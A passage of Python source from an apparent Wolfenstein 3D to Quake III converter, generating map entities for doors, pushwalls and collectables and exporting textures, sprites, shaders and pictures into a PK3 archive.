'noise "sound/{}/{}"'.format(params.short_name, 'adlib/menu__exit'),
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'angle -2',
'lip 0',
'dmg 0',
'health 0',
'wait {:f}'.format(give_wait),
'speed 32767',
]
door_end = ['}']
# Sprite brush
face_shader = '{}_collectable/{}'.format(params.short_name, name)
door_brush = self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
light_entity = [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
else:
light_entity = []
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
give_entity + target_entity + light_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door(self, tile_coords):
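        """Describe a Wolf3D door as Q3 entities: a trigger_multiple
        targeting a sliding func_door slab, open/close target_speakers
        chained through a target_delay, and a companion nodraw brush
        offset into the underworld."""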
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
_, texture_name, vertical = cfg.DOOR_MAP[tile]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'wait {}'.format(params.door_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__open'), # FIXME: filename
'}',
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'target "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'wait {}'.format((params.door_trigger_wait + params.door_wait) / 2),
'}',
]
speaker_close_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__close'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'angle {:.0f}'.format(270 if vertical else 0),
'lip 2',
'dmg 0',
'health 0',
'wait {}'.format(params.door_wait),
'speed {}'.format(params.door_speed),
]
door_end = ['}']
# Door brush
face_shader = '{}_wall/{}__{}'.format(params.short_name, texture_name, int(vertical))
if vertical:
extreme_a = ((center_x - 1), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders = [
'common/caulk',
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
]
else:
extreme_a = ((center_x - half), (center_y - 1), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders = [
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
'common/caulk',
]
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
door_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales, flip_directions=(EAST, WEST))
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door_hint(self, tile_coords):
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
vertical = cfg.DOOR_MAP[tile][2]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
face_shaders = ['common/skip'] * 6
if vertical:
extreme_a = ((center_x - 0), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders[WEST] = 'common/hint'
else:
extreme_a = ((center_x - half), (center_y - 0), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders[NORTH] = 'common/hint'
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
hint_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return hint_brush
def describe_floor_ceiling_clipping(self, thickness=1):
lines = []
face_shaders = ['common/full_clip'] * 6
shader_scales = (1, 1)
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), -thickness)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), 0)
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), tile_units)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (tile_units + thickness))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_underworld_hollow(self, offset_z=0, thickness=1): # TODO: factorized code for hollows
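        """Build a hollow, caulked box below the playfield, shifted by
        ``offset_z``: floor and ceiling slabs plus four walls of the given
        ``thickness``. It encloses the companion nodraw brushes that door
        and pushwall entities keep in the underworld."""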
lines = []
face_shaders = ['common/caulk'] * 6
shader_scales = [self.params.shader_scale, self.params.shader_scale]
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
t = thickness
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - 0 - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + t - tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - t + tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + 0 + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_a[0] + t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_b[0] - t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_a[1] + t), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_b[1] - t), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_worldspawn(self):
params = self.params
cfg = self.cfg
dimensions = self.tilemap.dimensions
tilemap = self.tilemap
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
music_name = cfg.MUSIC_LABELS[cfg.TILEMAP_MUSIC_INDICES[self.tilemap_index]]
lines = [
'{',
'classname worldspawn',
'music "music/{}/{}"'.format(params.short_name, music_name),
'ambient 100',
'_color "1 1 1"',
'message "{}"'.format(tilemap.name),
'author "{}"'.format(params.author),
]
if params.author2:
lines.append('author2 "{}"'.format(params.author2))
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=1,
cache=self.tile_partition_cache)
lines.append('// {} @ {!r} = tile 0x{:04X}'.format(partition, tile_coords, tile))
if (partition in ('floor', 'door', 'door_silver', 'door_gold', 'door_elevator') or
entity == pushwall_entity):
lines.extend(self.describe_area_brushes(tile_coords))
elif partition == 'wall':
lines.extend(self.describe_wall_brush(tile_coords))
else:
raise ValueError((tile_coords, partition))
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}, hint'.format(partition, tile_coords, tile))
lines += self.describe_door_hint(tile_coords)
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
if cfg.ENTITY_OBJECT_MAP.get(entity) in cfg.STATIC_OBJECT_NAMES:
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_sprite(tile_coords)
elif partition == 'enemy':
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_dead_enemy_sprite(tile_coords)
lines.append('// floor and ceiling clipping planes')
lines += self.describe_floor_ceiling_clipping()
lines.append('// underworld hollow')
lines += self.describe_underworld_hollow(params.underworld_offset)
lines.append('} // worldspawn')
return lines
def compute_progression_field(self, player_start_tile_coords):
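        """Flood-fill the tilemap from the player start and return a
        ``{(x, y): bitmask}`` dict, where bit ``direction`` (NORTH..WEST)
        is set when the adjacent tile in that direction can be walked into,
        i.e. it holds no solid object and is not a wall, unless the wall
        hides a pushwall."""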
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
wall_start = cfg.TILE_PARTITION_MAP['wall'][0]
wall_endex = wall_start + cfg.TILE_PARTITION_MAP['wall'][1]
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
field = {(x, y): 0 for y in range(dimensions[1]) for x in range(dimensions[0])}
visited = {(x, y) : False for y in range(dimensions[1]) for x in range(dimensions[0])}
border_tiles = collections.deque([player_start_tile_coords])
while border_tiles:
tile_coords = border_tiles.popleft()
if not visited[tile_coords]:
visited[tile_coords] = True
field_value = field[tile_coords]
x, y = tile_coords
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
xd, yd, _ = displacement
facing_coords = (x + xd, y + yd)
facing_tile = tilemap.get(facing_coords)
if facing_tile is not None:
object_name = cfg.ENTITY_OBJECT_MAP.get(facing_tile[1])
if (not visited[facing_coords] and object_name not in cfg.SOLID_OBJECT_NAMES and
(not (wall_start <= facing_tile[0] < wall_endex) or facing_tile[1] == pushwall_entity)):
border_tiles.append(facing_coords)
field_value |= (1 << direction)
field[tile_coords] = field_value
return field
def describe_player_start(self, tile_coords):
tile = self.tilemap[tile_coords]
index = tile[1] - self.cfg.ENTITY_PARTITION_MAP['start'][0]
origin = self.center_units(tile_coords, self.unit_offsets)
origin[2] += 32
player_start = [
'{',
'classname info_player_start',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
player_intermission = [
'{',
'classname info_player_intermission',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
return player_start + player_intermission
def describe_turn(self, tile_coords, turn_coords):
tilemap = self.tilemap
index = tilemap[tile_coords][1] - self.cfg.ENTITY_PARTITION_MAP['turn'][0]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
step = TURN_TO_DISPL[index]
target_coords = [(tile_coords[0] + step[0]), (tile_coords[1] + step[1])]
lines = []
found = False
while tilemap.check_coords(target_coords):
for coords in turn_coords:
if coords[0] == target_coords[0] and coords[1] == target_coords[1]:
found = True
break
else:
target_coords[0] += step[0]
target_coords[1] += step[1]
if found:
break
else:
raise ValueError('no target turning point for the one at {!r}'.format(tile_coords))
lines += [
'{',
'classname path_corner',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(TURN_TO_YAW[index]),
'targetname "corner_{:.0f}_{:.0f}"'.format(*tile_coords),
'target "corner_{:.0f}_{:.0f}"'.format(*target_coords),
'}',
]
return lines
def describe_enemy(self, tile_coords, turn_tiles):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
direction, level = enemy[1], enemy[3]
if params.enemy_level_min <= level <= params.enemy_level_max and direction < 4:
angle = DIR_TO_YAW[ENEMY_INDEX_TO_DIR[direction]]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
return [
'{',
'classname info_player_deathmatch',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(angle),
'}',
]
return ()
def describe_dead_enemy_sprite(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
name = enemy[0] + '__dead'
face_shader = '{}_enemy/{}'.format(params.short_name, name)
return self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
else:
return ()
def describe_object(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
lines = []
name = cfg.ENTITY_OBJECT_MAP.get(tile[1])
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
lines += [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
lines.append('// TODO')
return lines
def describe_pushwall(self, tile_coords, progression_field):
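        """Describe a pushwall as a func_door that slides the textured wall
        brush along the first passable direction found in
        ``progression_field``, fired by a trigger_multiple at the wall tile,
        with a companion nodraw brush parked at the computed stop tile in
        the underworld."""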
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
field_value = progression_field[tile_coords]
for direction in range(4):
if field_value & (1 << direction):
move_direction = direction
xd, yd = DIR_TO_DISPL[move_direction][:2]
break
else:
            raise ValueError('Pushwall @ {!r} cannot be reached or cannot move'.format(tile_coords))
trigger_begin = [
'{',
'classname trigger_multiple',
'target "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'wait {}'.format(params.pushwall_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[0] -= xd
unit_offsets[1] += yd
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/pushwall__move'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'angle {:.0f}'.format(DIR_TO_YAW[move_direction]),
'lip {}'.format(params.tile_units + 2),
'dmg 0',
'health 0',
'wait {}'.format(params.pushwall_wait),
'speed {}'.format(params.pushwall_speed),
# TODO: crusher
]
door_end = ['}']
# Door brush
face_shaders = []
texture = tile[0] - cfg.TILE_PARTITION_MAP['wall'][0]
for direction in range(4):
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
door_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
# Underworld brush
stop_coords = list(tile_coords)
steps = 0
while progression_field[tuple(stop_coords)] & (1 << move_direction) and steps < 3: # FIXME: magic 3
stop_coords[0] += xd
stop_coords[1] += yd
steps += 1
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(stop_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end + speaker_open_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_entities(self): # TODO
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
lines = []
turn_list = []
enemy_list = []
pushwall_list = []
player_start_coords = None
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
description = '// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity)
entity_object = cfg.ENTITY_OBJECT_MAP.get(entity)
if partition == 'start':
if player_start_coords is not None:
raise ValueError('There can be only one player start entity')
player_start_coords = tile_coords
lines.append(description)
lines += self.describe_player_start(tile_coords)
elif partition == 'turn':
turn_list.append([description, tile_coords])
elif partition == 'enemy':
enemy_list.append([description, tile_coords])
elif partition == 'pushwall':
pushwall_list.append([description, tile_coords])
elif entity_object in cfg.COLLECTABLE_OBJECT_NAMES:
lines.append(description)
lines += self.describe_collectable(tile_coords)
elif partition == 'object':
lines.append(description)
lines += self.describe_object(tile_coords)
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=-1,
cache=self.tile_partition_cache)
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}'.format(partition, tile_coords, tile))
lines += self.describe_door(tile_coords)
progression_field = self.compute_progression_field(player_start_coords)
for description, tile_coords in pushwall_list:
lines.append(description)
lines += self.describe_pushwall(tile_coords, progression_field)
turn_list_entities = [turn[1] for turn in turn_list]
# for description, tile_coords in turn_list:
# lines.append(description)
# lines += self.describe_turn(tile_coords, turn_list_entities)
for description, tile_coords in enemy_list:
lines.append(description)
lines += self.describe_enemy(tile_coords, turn_list_entities)
lines.append('// progression field')
lines += ['// ' + ''.join('{:X}'.format(progression_field[x, y]) for x in range(dimensions[0]))
for y in range(dimensions[1])]
return lines
def describe_tilemap(self):
tilemap = self.tilemap
lines = ['// map #e{}m{}: "{}"'.format(self.episode_index + 1, self.submap_index + 1, tilemap.name)]
lines += self.describe_worldspawn()
lines += self.describe_entities()
return lines
def build_argument_parser():
parser = argparse.ArgumentParser()
group = parser.add_argument_group('input paths')
group.add_argument('--input-folder', default='.')
group.add_argument('--vswap-data', required=True)
group.add_argument('--graphics-data', required=True)
group.add_argument('--graphics-header', required=True)
group.add_argument('--graphics-huffman', required=True)
group.add_argument('--audio-data', required=True)
group.add_argument('--audio-header', required=True)
group.add_argument('--maps-data', required=True)
group.add_argument('--maps-header', required=True)
group.add_argument('--palette') # TODO
group = parser.add_argument_group('output paths')
group.add_argument('--output-folder', default='.')
group.add_argument('--output-pk3', required=True)
group = parser.add_argument_group('settings')
group.add_argument('--cfg', required=True)
group.add_argument('--short-name', default='wolf3d')
group.add_argument('--author', default='(c) id Software')
group.add_argument('--author2')
group.add_argument('--wave-rate', default=22050, type=int)
group.add_argument('--imf-rate', default=700, type=int)
group.add_argument('--imf2wav-path', default=IMF2WAV_PATH)
group.add_argument('--ogg-rate', default=44100, type=int)
group.add_argument('--oggenc2-path', default=OGGENC2_PATH)
group.add_argument('--tile-units', default=96, type=int)
group.add_argument('--alpha-index', default=0xFF, type=int)
group.add_argument('--fix-alpha-halo', action='store_true')
group.add_argument('--texture-scale', default=4, type=int)
group.add_argument('--shader-scale', default=0.375, type=float)
group.add_argument('--door-wait', default=5, type=float)
group.add_argument('--door-speed', default=100, type=float)
group.add_argument('--door-trigger-wait', default=5, type=float)
group.add_argument('--pushwall-wait', default=32767, type=float)
group.add_argument('--pushwall-speed', default=90, type=float)
group.add_argument('--pushwall-trigger-wait', default=32767, type=float)
group.add_argument('--underworld-offset', default=-4096, type=int)
group.add_argument('--enemy-level-min', default=0, type=int)
group.add_argument('--enemy-level-max', default=3, type=int)
return parser
def _sep():
logger = logging.getLogger()
logger.info('-' * 80)
def export_textures(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting textures')
start = 0
count = vswap_chunks_handler.sprites_start - start
texture_manager = pywolf.graphics.TextureManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count)
scaled_size = [side * params.texture_scale for side in cfg.TEXTURE_DIMENSIONS]
for i, texture in enumerate(texture_manager):
name = cfg.TEXTURE_NAMES[i >> 1]
path = 'textures/{}_wall/{}__{}.tga'.format(params.short_name, name, (i & 1))
logger.info('Texture [%d/%d]: %r', (i + 1), count, path)
image = texture.image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, scaled_size, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
palette = cfg.GRAPHICS_PALETTE
for i, color in enumerate(palette):
path = 'textures/{}_palette/color_0x{:02x}.tga'.format(params.short_name, i)
logger.info('Texture palette color [%d/%d]: %r, (0x%02X, 0x%02X, 0x%02X)',
(i + 1), len(palette), path, *color)
image = build_color_image(cfg.TEXTURE_DIMENSIONS, color)
image = image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, cfg.TEXTURE_DIMENSIONS, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
logger.info('Done')
_sep()
def write_texture_shaders(params, cfg, shader_file, palette_shaders=True):
for name in cfg.TEXTURE_NAMES:
for j in range(2):
shader_name = 'textures/{}_wall/{}__{}'.format(params.short_name, name, j)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
if palette_shaders:
palette = cfg.GRAPHICS_PALETTE
for i in range(len(palette)):
shader_name = 'textures/{}_palette/color_0x{:02x}'.format(params.short_name, i)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
def write_static_shaders(params, cfg, shader_file):
for name in cfg.STATIC_OBJECT_NAMES:
shader_name = 'textures/{}_static/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_collectable_shaders(params, cfg, shader_file):
for name in cfg.COLLECTABLE_OBJECT_NAMES:
shader_name = 'textures/{}_collectable/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_enemy_shaders(params, cfg, shader_file):
ignored_names = cfg.STATIC_OBJECT_NAMES + cfg.COLLECTABLE_OBJECT_NAMES
names = [name for name in cfg.SPRITE_NAMES if name not in ignored_names or name.endswith('__dead')]
for name in names:
shader_name = 'textures/{}_enemy/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def export_shader(params, cfg, zip_file, script_name, shader_writer):
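    """Render one shader script via ``shader_writer`` and store it both
    inside the PK3 archive and as a plain file under
    ``<output_folder>/scripts``."""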
shader_text_stream = io.StringIO()
shader_writer(params, cfg, shader_text_stream)
shader_text = shader_text_stream.getvalue()
zip_file.writestr('scripts/{}'.format(script_name), shader_text.encode())
folder = os.path.join(params.output_folder, 'scripts')
os.makedirs(folder, exist_ok=True)
with open(os.path.join(folder, script_name), 'wt') as shader_file:
shader_file.write(shader_text)
def export_shaders(params, cfg, zip_file):
logger = logging.getLogger()
logger.info('Exporting shaders')
script_writer_map = {
'{}_wall.shader'.format(params.short_name): write_texture_shaders,
'{}_static.shader'.format(params.short_name): write_static_shaders,
'{}_collectable.shader'.format(params.short_name): write_collectable_shaders,
'{}_enemy.shader'.format(params.short_name): write_enemy_shaders,
}
for script_name, shader_writer in script_writer_map.items():
export_shader(params, cfg, zip_file, script_name, shader_writer)
logger.info('Done')
_sep()
def image_to_array(image, shape, dtype=np.uint8):
return np.array(image.getdata(), dtype).reshape(shape)
def array_to_rgbx(arr, size, channels):
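    """Convert an (H, W, C) array into a PIL ``RGB``/``RGBA`` image,
    appending a fully opaque alpha channel when a 3-channel array is
    promoted to 4 channels."""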
assert 3 <= channels <= 4
mode = 'RGBA' if channels == 4 else 'RGB'
arr = arr.reshape(arr.shape[0] * arr.shape[1], arr.shape[2]).astype(np.uint8)
if channels == 4 and len(arr[0]) == 3: # FIXME: make generic, this is only for RGB->RGBA
arr = np.c_[arr, 255 * np.ones((len(arr), 1), np.uint8)]
    return Image.frombuffer(mode, size, arr.tobytes(), 'raw', mode, 0, 1)
def fix_sprite_halo(rgba_image, alpha_layer):
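    """Replace the RGB values of fully transparent pixels with the average
    of their 8 opaque neighbours, so that texture filtering of the scaled
    sprite does not bleed dark halo fringes around the silhouette."""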
alpha_layer = image_to_array(alpha_layer, rgba_image.size)
mask_cells = (alpha_layer != 0)
mask = mask_cells.astype(np.uint8)
source = image_to_array(rgba_image, rgba_image.size + (4,))
source *= mask[..., None].repeat(4, axis=2)
accum = np.zeros_like(source, np.uint16)
accum[ :-1, : ] += source[1: , : ]
accum[1: , : ] += source[ :-1, : ]
accum[ : , :-1] += source[ : , 1: ]
accum[ : , 1: ] += source[ : , :-1]
accum[ :-1, :-1] += source[1: , 1: ]
accum[ :-1, 1: ] += source[1: , :-1]
accum[1: , :-1] += source[ :-1, 1: ]
accum[1: , 1: ] += source[ :-1, :-1]
count = np.zeros_like(mask)
count[ :-1, : ] += mask[1: , : ]
count[1: , : ] += mask[ :-1, : ]
count[ : , :-1] += mask[ : , 1: ]
count[ : , 1: ] += mask[ : , :-1]
count[ :-1, :-1] += mask[1: , 1: ]
count[ :-1, 1: ] += mask[1: , :-1]
count[1: , :-1] += mask[ :-1, 1: ]
count[1: , 1: ] += mask[ :-1, :-1]
count_div = np.maximum(np.ones_like(count), count)
count_div = count_div[..., None].repeat(4, axis=2)
accum = (accum // count_div).astype(np.uint8)
accum[..., 3] = 0
accum[mask_cells] = source[mask_cells]
result = array_to_rgbx(accum, rgba_image.size, 4)
return result
def export_sprites(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sprites')
start = vswap_chunks_handler.sprites_start
count = vswap_chunks_handler.sounds_start - start
sprite_manager = pywolf.graphics.SpriteManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count, params.alpha_index)
scaled_size = [side * params.texture_scale for side in cfg.SPRITE_DIMENSIONS]
for i, sprite in enumerate(sprite_manager):
name = cfg.SPRITE_NAMES[i]
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
logger.info('Sprite [%d/%d]: %r', (i + 1), count, path)
image = sprite.image.convert('RGBA')
if params.fix_alpha_halo:
alpha_layer = image.split()[-1].transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
image = image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
if params.fix_alpha_halo:
image = fix_sprite_halo(image, alpha_layer)
pixels_bgra = bytes(x for pixel in image.getdata()
for x in [pixel[2], pixel[1], pixel[0], pixel[3]])
sprite_stream = io.BytesIO()
write_targa_bgrx(sprite_stream, scaled_size, 32, pixels_bgra)
zip_file.writestr(path, sprite_stream.getbuffer())
logger.info('Done')
_sep()
def export_pictures(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting pictures')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['pics']
picture_manager = pywolf.graphics.PictureManager(graphics_chunks_handler, palette_map, start, count)
for i, picture in enumerate(picture_manager):
path = 'gfx/{}/{}.tga'.format(params.short_name, cfg.PICTURE_NAMES[i])
logger.info('Picture [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = picture.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
picture_stream = io.BytesIO()
write_targa_bgrx(picture_stream, picture.dimensions, 24, pixels_bgr)
zip_file.writestr(path, picture_stream.getbuffer())
logger.info('Done')
_sep()
def export_tile8(params, cfg, zip_file, graphics_chunks_handler):
